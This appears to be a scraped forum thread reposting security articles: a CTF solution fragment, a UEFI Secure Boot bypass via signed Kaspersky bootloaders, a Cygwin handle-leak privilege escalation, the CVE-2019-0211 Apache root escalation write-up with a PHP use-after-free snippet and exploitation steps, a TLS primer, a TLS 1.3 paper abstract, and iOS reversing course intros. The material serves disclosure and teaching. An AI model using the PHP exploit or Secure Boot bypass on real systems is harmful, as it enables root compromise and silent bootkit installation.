with 0x47 and branches to 0x804bb37 while R3 is less than 0x47. When the condition becomes false, it executes from 0x804ca3b Algorithm So, the logic is int main() { int i = 0; char arr[] = { 26, 25, 11, 49, 6, 4, 24, 16, 10, 51, 25, 10, 51, 0, 10, 60, 25, 13, 6, 25, 60, 14, 16, 60, 16, 12, 50, 10, 20, 13, 6, 25, 60, 25, 6, 51, 4, 10, 51, 25, 14, 6, 49, 49, 30, 60, 23, 10, 49, 6, 25, 10, 9, 60, 25, 12, 60, 25, 13, 10, 60, 0, 13, 6, 49, 49, 10, 51, 4, 10, 2 }; for (i = 0; i < 0x47; ++i) { arr[i] = (arr[i]^0x53)-3 ^ 0x33; } } Executing the above code, yields the flag - utflag{sentence_that_is_somewhat_tangentially_related_to_the_challenge} Sursa: https://x0r19x91.github.io/2019/utctf-mov
  17. ValdikSS April 1, 2019 at 01:24 PM Exploiting signed bootloaders to circumvent UEFI Secure Boot UEFI, Information Security Русская версия этой статьи. Modern PC motherboards' firmware follow UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, additional hardware firmware like video card and network adapter OPROMs). Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is physical presence of the user at the computer. It is necessary to enter UEFI settings when the computer boots, and only then it's possible to change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable software vendors to ask Microsoft to sign their bootloaders. This process include code audit procedure and justification for the need to sign their file with globally trusted key if they want the disk or USB flash to work in Secure Boot mode without adding their key on each computer manually. Linux distributions, hypervisors, antivirus boot disks, computer recovery software authors all have to sign their bootloaders in Microsoft. I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved. Signed bootloaders of bootloaders So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft forbid to sign software licensed under GPLv3 because of tivoization restriction license rule, therefore >GRUB cannot be signed. To address this issue, Linux Foundation released PreLoader and Matthew Garrett made shim—small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use UEFI db certificate store, but contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file. Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted programs in Secure Boot mode, but require the physical presence of the user. When executed for the first time, you need to select a certificate to be added or the file to be hashed in the graphical interface, after which the data is added into a special NVRAM variable on the motherboard which is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still couldn't be loaded without PreLoader or shim. Untrusted software first boot with shim. All modern popular Linux distributions use shim due to certificate support, which makes it easy to provide updates for the main bootloader without the need for user interaction. In general, shim is used to run GRUB2 — the most popular bootloader in Linux. GRUB2 To prevent signed bootloader abuse with malicious intentions, Red Hat created patches for GRUB2 that block «dangerous» functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi) ,multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi-files, introduced its own custom internal .efi (PE) loader without using the UEFI LoadImage/StartImage functions, as well as the validation code of the loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI. It's not exactly clear why this method is preferable—UEFI allows one to redefine (hook) UEFI verification functions, this is how PreLoader works, and indeed in the very shim feature is presented but disabled by default. Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted files: Use modded GRUB with internal EFI loader, without digital signature vertification or module restrictions; Use custom pre-loader (the second one) which hook UEFI file vertification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication) The second method is preferable as executed software can load and start another software, for example, UEFI shell can execute any program. The first method does not provide this, allowing only GRUB to execute arbitrary files. Let's modify PreLoader by removing all unnecessary features and patch verification code to allow everything. Disk architecture is as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ → /_│ │ → /_│ │ │ │ → │ │ → │ │ │ EFI │ → │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (shim) (FileAuthentication (GRUB2) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ MokManager.efi (Key enrolling tool) This is how Super UEFIinSecureBoot Disk has been made. Super UEFIinSecureBoot Disk is a bootable image with GRUB2 bootloader designed to be used as a base for recovery USB flash drives. Key feature: disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with untrusted, invalid or missing signature. The disk could be used to run various Live Linux distributions, WinPE environment, network boot, without disabling Secure Boot mode in UEFI settings, which could be convenient for performing maintenance of someone else's PC and corporate laptops, for example, with UEFI settings locked with a password. The image contains 3 components: shim pre-loader from Fedora (signed with Microsoft key which is pre-installed in most motherboards and laptops), modified Linux Foundation PreLoader (disables digital signature verification of executed files), and modified GRUB2 loader. On the first boot it's necessary to select the certificate using MokManager (starts automatically), after that everything will work just as with Secure Boot disabled—GRUB loads any unsigned .efi file or Linux kernel, executed EFI programs can load any other untrusted executables or drivers. To demonstrate disk functions, the image contains Super Grub Disk (a set of scripts to search and execute OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to load Linux Live distros directly from ISO file), One File Linux (the kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot and with older PCs with BIOS. Signed bootloaders I was wondering is it possible to bypass first boot key enrollment through shim. Could there be some signed bootloaders that allow you to do more than the authors expected? As it turned out—there are such loaders. One of them is used in Kaspersky Rescue Disk 18—antivirus software boot disk. GRUB from the disk allows you to load modules (the insmod command), and module in GRUB is just an executable code. The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead self-loads the .efi file into memory, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in Red Hat GRUB Secure Boot repository, the only problem—PE header parser is missing. GRUB gets parsed header from shim, in a response to a function call via a special protocol. This could be easily fixed by porting the appropriate code from the shim or PreLoader to GRUB. This is how Silent UEFIinSecureBoot Disk has been made. The final disk architecture looks as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ /_│ │ → /_│ │ │ │ │ │ → │ │ │ EFI │ │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (Kaspersky (FileAuthentication (GRUB2) Loader) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ fde_ld.efi + custom chain.mod (Kaspersky GRUB2) The end In this article we proved the existence of not enough reliable bootloaders signed by Microsoft key, which allows booting untrusted code in Secure Boot mode. Using signed Kaspersky Rescue Disk files, we achieved a silent boot of any untrusted .efi files with Secure Boot enabled, without the need to add a certificate to UEFI db or shim MOK. These files can be used both for good deeds (for booting from USB flash drives) and for evil ones (for installing bootkits without computer owner consent). I assume that Kaspersky bootloader signature certificate will not live long, and it will be added to global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this would happen. Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/ About ZeroNet Sursa: https://habr.com/en/post/446238/
      • 1
      • Upvote
  18. Exploiting a privileged zombie process handle leak on Cygwin March 29th, 2019 Vulnerability Two months ago, I was playing with Cygwin and I noticed that all Cygwin processes inherited dead process handles using Process Hacker: Bash.exe process spawned by SSH daemon after a successful connection (1) runs with a newly created token as limited test user. Indeed, Cygwin SSHD worked at the time with an administrator account (cyg_server) emulating set(e)uid by creating a new user token using undocumented NtCreateToken. See Cygwin documentation for more information about the change with version 3.0. The same bash.exe process inherits 3 handles of non-existent processes with full access rights (2). Tracing the process creation and termination with Process Monitor during the SSH connection revealed that these leaked handles are actually privileged process (3) running as cyg_server. Exploitation So what can we do with privileged zombie process handles, since we have full access (PROCESS_ALL_ACCESS) we can: Access Right Possible action OpenProcessToken FAIL Access denied PROCESS_VM_OPERATION FAIL: Any VM operation will fail because the process does not have a address space anymore PROCESS_CREATE_THREAD FAIL: Same problem, no address space, creating thread in the process will NOT work PROCESS_DUP_HANDLE FAIL: Access denied on DuplicateHandle (not sure why :D) PROCESS_CREATE_PROCESS SUCCESS: Finally! Let’s see how to use this privilege: When creating a process, the attribute PROC_THREAD_ATTRIBUTE_PARENT_PROCESS in STARTUPINFO structure allows the calling process to use a different process as the parent for the process being created. The calling process must have PROCESS_CREATE_PROCESS access right on the process handle used as the parent. From Windows documentation: Attributes inherited from the specified process include handles, the device map, processor affinity, priority, quotas, the process token, and job object. So the spawned process will use the privileged token thus it will run as cyg_server: This exploitation technique is not new and there are maybe other ways to exploit this case but I wanted to show a real world example of create process with parent handle instead of just posting about it. I find it cleaner than injecting a shellcode in a privileged process to spawn a process. Exploit source Fix The vulnerability is now fixed with Cygwin version 3.0 thanks to the maintainers that were very responsive. Commit 1: Restricting permissions Commit 2: Restricting permissions on exec Commit 3: Removing the handle inheritance Sursa: https://masthoon.github.io/exploit/2019/03/29/cygeop.html
  19. Web Security Academy Welcome to the Web Security Academy. This is a brand new learning resource providing free training on web security vulnerabilities, techniques for finding and exploiting bugs, and defensive measures for avoiding them. The Web Security Academy contains high-quality learning materials, interactive vulnerability labs, and video tutorials. You can learn at your own pace, wherever and whenever suits you. Best of all, everything is free! To access the vulnerability labs and track your progress, you'll just need to log in. Sign up if you don't have an account already. To get things started, we're covering four of the most serious "classic" vulnerabilities: SQL injection Cross-site scripting (XSS) OS command injection File path traversal (directory traversal) Over the coming months, we'll be adding a series of further topics and a large number of new vulnerability labs. The team behind the Web Security Academy includes Dafydd Stuttard, author of The Web Application Hacker's Handbook. Sursa: https://portswigger.net/web-security
  20. CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation 2019-04-03 Introduction From version 2.4.17 (Oct 9, 2015) to version 2.4.38 (Apr 1, 2019), Apache HTTP suffers from a local root privilege escalation vulnerability due to an out-of-bounds array access leading to an arbitrary function call. The vulnerability is triggered when Apache gracefully restarts (apache2ctl graceful). In standard Linux configurations, the logrotate utility runs this command once a day, at 6:25AM, in order to reset log file handles. The vulnerability affects mod_prefork, mod_worker and mod_event. The following bug description, code walkthrough and exploit target mod_prefork. Bug description In MPM prefork, the main server process, running as root, manages a pool of single-threaded, low-privilege (www-data) worker processes, meant to handle HTTP requests. In order to get feedback from its workers, Apache maintains a shared-memory area (SHM), scoreboard, which contains various informations such as the workers PIDs and the last request they handled. Each worker is meant to maintain a process_score structure associated with its PID, and has full read/write access to the SHM. ap_scoreboard_image: pointers to the shared memory block (gdb) p *ap_scoreboard_image $3 = { global = 0x7f4a9323e008, parent = 0x7f4a9323e020, servers = 0x55835eddea78 } (gdb) p ap_scoreboard_image->servers[0] $5 = (worker_score *) 0x7f4a93240820 Example of shared memory associated with worker PID 19447 (gdb) p ap_scoreboard_image->parent[0] $6 = { pid = 19447, generation = 0, quiescing = 0 '\000', not_accepting = 0 '\000', connections = 0, write_completion = 0, lingering_close = 0, keep_alive = 0, suspended = 0, bucket = 0 <- index for all_buckets } (gdb) ptype *ap_scoreboard_image->parent type = struct process_score { pid_t pid; ap_generation_t generation; char quiescing; char not_accepting; apr_uint32_t connections; apr_uint32_t write_completion; apr_uint32_t lingering_close; apr_uint32_t keep_alive; apr_uint32_t suspended; int bucket; <- index for all_buckets } When Apache gracefully restarts, its main process kills old workers and replaces them by new ones. At this point, every old worker's bucket value will be used by the main process to access an array of his, all_buckets. all_buckets (gdb) p $index = ap_scoreboard_image->parent[0]->bucket (gdb) p all_buckets[$index] $7 = { pod = 0x7f19db2c7408, listeners = 0x7f19db35e9d0, mutex = 0x7f19db2c7550 } (gdb) ptype all_buckets[$index] type = struct prefork_child_bucket { ap_pod_t *pod; ap_listen_rec *listeners; apr_proc_mutex_t *mutex; <-- } (gdb) ptype apr_proc_mutex_t apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } (gdb) ptype apr_proc_mutex_unix_lock_methods_t apr_proc_mutex_unix_lock_methods_t { ... apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- ... } No bound checks happen. Therefore, a rogue worker can change its bucket index and make it point to the shared memory, in order to control the prefork_child_bucket structure upon restart. Eventually, and before privileges are dropped, mutex->meth->child_init() is called. This results in an arbitrary function call as root. Vulnerable code We'll go through server/mpm/prefork/prefork.c to find out where and how the bug happens. A rogue worker changes its bucket index in shared memory to make it point to a structure of his, also in SHM. At 06:25AM the next day, logrotate requests a graceful restart from Apache. Upon this, the main Apache process will first kill workers, and then spawn new ones. The killing is done by sending SIGUSR1 to workers. They are expected to exit ASAP. Then, prefork_run() (L853) is called to spawn new workers. Since retained->mpm->was_graceful is true (L861), workers are not restarted straight away. Instead, we enter the main loop (L933) and monitor dead workers' PIDs. When an old worker dies, ap_wait_or_timeout() returns its PID (L940). The index of the process_score structure associated with this PID is stored in child_slot (L948). If the death of this worker was not fatal (L969), make_child() is called with ap_get_scoreboard_process(child_slot)->bucket as a third argument (L985). As previously said, bucket's value has been changed by a rogue worker. make_child() creates a new child, fork()ing (L671) the main process. The OOB read happens (L691), and my_bucket is therefore under the control of an attacker. child_main() is called (L722), and the function call happens a bit further (L433). SAFE_ACCEPT(<code>) will only execute <code> if Apache listens on two ports or more, which is often the case since a server listens over HTTP (80) and HTTPS (443). Assuming <code> is executed, apr_proc_mutex_child_init() is called, which results in a call to (*mutex)->meth->child_init(mutex, pool, fname) with mutex under control. Privileges are dropped a bit later in the execution (L446). Exploitation The exploitation is a four step process: 1. Obtain R/W access on a worker process 2. Write a fake prefork_child_bucket structure in the SHM 3. Make all_buckets[bucket] point to the structure 4. Await 6:25AM to get an arbitrary function call Advantages: - The main process never exits, so we know where everything is mapped by reading /proc/self/maps (ASLR/PIE useless) - When a worker dies (or segfaults), it is automatically restarted by the main process, so there is no risk of DOSing Apache Problems: - PHP does not allow to read/write /proc/self/mem, which blocks us from simply editing the SHM - all_buckets is reallocated after a graceful restart (!) 1. Obtain R/W access on a worker process PHP UAF 0-day Since mod_prefork is often used in combination with mod_php, it seems natural to exploit the vulnerability through PHP. CVE-2019-6977 would be a perfect candidate, but it was not out when I started writing the exploit. I went with a 0day UAF in PHP 7.x (which seems to work in PHP5.x as well): PHP UAF <?php class X extends DateInterval implements JsonSerializable { public function jsonSerialize() { global $y, $p; unset($y[0]); $p = $this->y; return $this; } } function get_aslr() { global $p, $y; $p = 0; $y = [new X('PT1S')]; json_encode([1234 => &$y]); print("ADDRESS: 0x" . dechex($p) . "\n"); return $p; } get_aslr(); This is an UAF on a PHP object: we unset $y[0] (an instance of X), but it is still usable using $this. UAF to Read/Write We want to achieve two things: - Read memory to find all_buckets' address - Edit the SHM to change bucket index and add our custom mutex structure Luckily for us, PHP's heap is located before those two in memory. Memory addresses of PHP's heap, ap_scoreboard_image->* and all_buckets root@apaubuntu:~# cat /proc/6318/maps | grep libphp | grep rw-p 7f4a8f9f3000-7f4a8fa0a000 rw-p 00471000 08:02 542265 /usr/lib/apache2/modules/libphp7.2.so (gdb) p *ap_scoreboard_image $14 = { global = 0x7f4a9323e008, parent = 0x7f4a9323e020, servers = 0x55835eddea78 } (gdb) p all_buckets $15 = (prefork_child_bucket *) 0x7f4a9336b3f0 Since we're triggering the UAF on a PHP object, any property of this object will be UAF'd too; we can convert this zend_object UAF into a zend_string one. This is useful because of zend_string's structure: (gdb) ptype zend_string type = struct _zend_string { zend_refcounted_h gc; zend_ulong h; size_t len; char val[1]; } The len property contains the length of the string. By incrementing it, we can read and write further in memory, and therefore access the two memory regions we're interested in: the SHM and Apache's all_buckets. Locating bucket indexes and all_buckets We want to change ap_scoreboard_image->parent[worker_id]->bucket for a certain worker_id. Luckily, the structure always starts at the beginning of the shared memory block, so it is easy to locate. Shared memory location and targeted process_score structures root@apaubuntu:~# cat /proc/6318/maps | grep rw-s 7f4a9323e000-7f4a93252000 rw-s 00000000 00:05 57052 /dev/zero (deleted) (gdb) p &ap_scoreboard_image->parent[0] $18 = (process_score *) 0x7f4a9323e020 (gdb) p &ap_scoreboard_image->parent[1] $19 = (process_score *) 0x7f4a9323e044 To locate all_buckets, we can make use of our knowledge of the prefork_child_bucket structure. We have: Important structures of bucket items prefork_child_bucket { ap_pod_t *pod; ap_listen_rec *listeners; apr_proc_mutex_t *mutex; <-- } apr_proc_mutex_t { apr_pool_t *pool; const apr_proc_mutex_unix_lock_methods_t *meth; <-- int curr_locked; char *fname; ... } apr_proc_mutex_unix_lock_methods_t { unsigned int flags; apr_status_t (*create)(apr_proc_mutex_t *, const char *); apr_status_t (*acquire)(apr_proc_mutex_t *); apr_status_t (*tryacquire)(apr_proc_mutex_t *); apr_status_t (*release)(apr_proc_mutex_t *); apr_status_t (*cleanup)(void *); apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <-- apr_status_t (*perms_set)(apr_proc_mutex_t *, apr_fileperms_t, apr_uid_t, apr_gid_t); apr_lockmech_e mech; const char *name; } all_buckets[0]->mutex will be located in the same memory region as all_buckets[0]. Since meth is a static structure, it will be located in libapr's .data. Since meth points to functions defined in libapr, each of the function pointers will be located in libapr's .text. Since we have knowledge of those region's addresses through /proc/self/maps, we can go through every pointer in Apache's memory and find one that matches the structure. It will be all_buckets[0]. As I mentioned, all_buckets's address changes at every graceful restart. This means that when our exploit triggers, all_buckets's address will be different than the one we found. This has to be taken into account; we'll talk about this later. 2. Write a fake prefork_child_bucket structure in the SHM Reaching the function call The code path to the arbitrary function call is the following: bucket_id = ap_scoreboard_image->parent[id]->bucket my_bucket = all_buckets[bucket_id] mutex = &my_bucket->mutex apr_proc_mutex_child_init(mutex) (*mutex)->meth->child_init(mutex, pool, fname) Calling something proper To exploit, we make (*mutex)->meth->child_init point to zend_object_std_dtor(zend_object *object), which yields the following chain: mutex = &my_bucket->mutex [object = mutex] zend_object_std_dtor(object) ht = object->properties zend_array_destroy(ht) zend_hash_destroy(ht) val = &ht->arData[0]->val ht->pDestructor(val) pDestructor is set to system, and &ht->arData[0]->val is a string. As you can see, both leftmost structures are superimposed. 3. Make all_buckets[bucket] point to the structure Problem and solution Right now, if all_buckets' address was unchanged in between restarts, our exploit would be over: Get R/W over all memory after PHP's heap Find all_buckets by matching its structure Put our structure in the SHM Change one of the process_score.bucket in the SHM so that all_bucket[bucket]->mutex points to our payload As all_buckets' address changes, we can do two things to improve reliability: spray the SHM and use every process_score structure - one for each PID. Spraying the shared memory If all_buckets' new address is not far from the old one, my_bucket will point close to our structure. Therefore, instead of having our prefork_child_bucket structure at a precise point in the SHM, we can spray it all over unused parts of the SHM. The problem is that the structure is also used as a zend_object, and therefore it has a size of (5 * 8 😃 40 bytes to include zend_object.properties. Spraying a structure that big over a space this small won't help us much. To solve this problem, we superimpose the two center structures, apr_proc_mutex_t and zend_array, and spray their address in the rest of the shared memory. The impact will be that prefork_child_bucket.mutex and zend_object.properties point to the same address. Now, if all_bucket is relocated not too far from its original address, my_bucket will be in the sprayed area. Using every process_score Each Apache worker has an associated process_score structure, and with it a bucket index. Instead of changing one process_score.bucket value, we can change every one of them, so that they cover another part of memory. For instance: ap_scoreboard_image->parent[0]->bucket = -10000 -> 0x7faabbcc00 <= all_buckets <= 0x7faabbdd00 ap_scoreboard_image->parent[1]->bucket = -20000 -> 0x7faabbdd00 <= all_buckets <= 0x7faabbff00 ap_scoreboard_image->parent[2]->bucket = -30000 -> 0x7faabbff00 <= all_buckets <= 0x7faabc0000 This multiplies our success rate by the number of apache workers. Upon respawn, only one worker have a valid bucket number, but this is not a problem because the others will crash, and immediately respawn. Success rate Different Apache servers have different number of workers. Having more workers mean we can spray the address of our mutex over less memory, but it also means we can specify more index for all_buckets. This means that having more workers improves our success rate. After a few tries on my test Apache server of 4 workers (default), I had ~80% success rate. The success rate jumps to ~100% with more workers. Again, if the exploit fails, it can be restarted the next day as Apache will still restart properly. Apache's error.log will nevertheless contain notifications about its workers segfaulting. 4. Await 6:25AM for the exploit to trigger Well, that's the easy step. Vulnerability timeline 2019-02-22 Initial contact email to security[at]apache[dot]org, with description and POC 2019-02-25 Acknowledgment of the vulnerability, working on a fix 2019-03-07 Apache's security team sends a patch for I to review, CVE assigned 2019-03-10 I approve the patch 2019-04-01 Apache HTTP version 2.4.39 released Apache's team has been prompt to respond and patch, and nice as hell. Really good experience. PHP never answered regarding the UAF. Questions Why the name ? CARPE: stands for CVE-2019-0211 Apache Root Privilege Escalation DIEM: the exploit triggers once a day I had to. Can the exploit be improved ? Yes. For instance, my computations for the bucket indexes are shaky. This is between a POC and a proper exploit. BTW, I added tons of comments, it is meant to be educational as well. Does this vulnerability target PHP ? No. It targets the Apache HTTP server. Exploit The exploit will be disclosed at a later date. Sursa: https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html
  21. TLS Security 1: What Is SSL/TLS Posted on April 3, 2019 by Agathoklis Prodromou Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead. SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library. SSL and TLS are frameworks that use a lot of different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithm to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446 and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101. Privacy & Integrity SSL/TLS protocols allow the connection between two mediums (client-server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL, and an attacker is sniffing local network traffic, they see the following information. The cookie that we use to authenticate on our website is sent in plain text and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker’s options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees something quite different. In this case, the information is useless to the attacker. Identification SSL/TLS protocols use public-key cryptography. Except for encryption, this technology is also used to authenticate communicating parties. This means, that one or both parties know exactly who they are communicating with. This is crucial for such applications as online transactions because must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TSL certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server’s identity. Such a certificate cannot be falsified, so the client may be one hundred percent sure that they are communicating with the right server. Perfect Forward Secrecy Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. These keys are valid only as long as the session is active. TLS Security 2 Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2. TLS Security 3 Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more. TLS Security 4 Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates. TLS Security 5 Learn how a TLS connection is established including key exchange, TLS handshakes, and more. TLS Security 6 Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed. Agathoklis Prodromou Web Systems Administrator/Developer Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a System Administrator and Web Developer but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response. Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
      • 1
      • Upvote
  22. Selfie: reflections on TLS 1.3 with PSK Nir Drucker and Shay Gueron University of Haifa, Israel,andAmazon, Seattle, USA Abstract. TLS 1.3 allows two parties to establish a shared session keyfrom an out-of-band agreed Pre Shared Key (PSK). The PSK is usedto mutually authenticate the parties, under the assumption that it isnot shared with others. This allows the parties to skip the certificateverification steps, saving bandwidth, communication rounds, and latency.We identify a security vulnerability in this TLS 1.3 path, by showing anew reflection attack that we call “Selfie”. TheSelfieattack breaks themutual authentication. It leverages the fact that TLS does not mandateexplicit authentication of the server and the client in every message.The paper explains the root cause of this TLS 1.3 vulnerability, demon-strates theSelfieattack on the TLS implementation of OpenSSL andproposes appropriate mitigation.The attack is surprising because it breaks some assumptions and uncoversan interesting gap in the existing TLS security proofs. We explain the gapin the model assumptions and subsequently in the security proofs. Wealso provide an enhanced Multi-Stage Key Exchange (MSKE) model thatcaptures the additional required assumptions of TLS 1.3 in its currentstate. The resulting security claims in the case of external PSKs areaccordingly different. Sursa: https://eprint.iacr.org/2019/347.pdf
      • 1
      • Upvote
  23. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
      • 1
      • Upvote
×
×
  • Create New...